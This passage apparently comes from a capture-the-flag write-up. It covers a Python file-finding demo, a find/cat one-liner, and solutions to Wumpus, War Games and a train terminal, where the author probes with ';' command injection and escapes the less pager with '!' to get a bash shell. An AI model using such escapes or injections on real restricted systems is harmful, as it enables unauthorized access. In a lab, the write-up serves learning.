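    with tempfile.TemporaryDirectory() as tmp:
        build_tree(tmp)
        results = []
        for path in find_files(tmp, KEY_NAME):
            with open(path) as fh:
                results.append((os.path.relpath(path, tmp), cat_command(path), fh.read()))
        return results


if __name__ == "__main__":
    for rel, cmd, text in demo():
        print(rel)
        print(cmd)
        print(text, end="")
```

In the terminal itself the equivalent one-liner is find ~/.doormat -type f -name key_for_the_door.txt -exec cat {} + which never needs the path typed at all; -exec passes the name to cat as a single argument, so the spaces, backslashes and quote in it are never seen by the shell.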


The Wumpus

I have no idea… but I killed the wumpus and got the passphrase.
I saw the "or cheat;" and took it as a hint, since a ";" can be used for command injection in some cases.
I was honestly throwing random inputs at the actions, as you can see in the screenshots, then I pressed Enter a bunch of times, decided to shoot an arrow with "s1" and killed the wumpus ¯\_(ツ)_/¯

Randomness!! 

Lucky shot?!
I had so many plans, I even encoded the binary in base64 and downloaded it to take a closer look, maybe disassemble or look for strings... Oh well!

War Games

I found a video of the movie with the dialogue; follow the dialogue and don't make any "mistak".
 
 
Greetings Professor Falken
Playing Nuclear War
 
Look at the pretty lights
 

Time Traveling Train

I used the menu's BRAKEOFF option first in case I had to move the train (I didn't), then went to read the HELP and noticed it looked like it was displayed with the 'less' command, so I used less's ability to run an external command (a line starting with !) and got a bash shell.

I found the ActivateTrain executable and ran it to travel in time to 1978.


Less is more

Time Travel to 1978 Successful

 
1978!
With all the terminal doors open, I found Santa in the DFER room in 1978.

Santa found in DFER room of 1978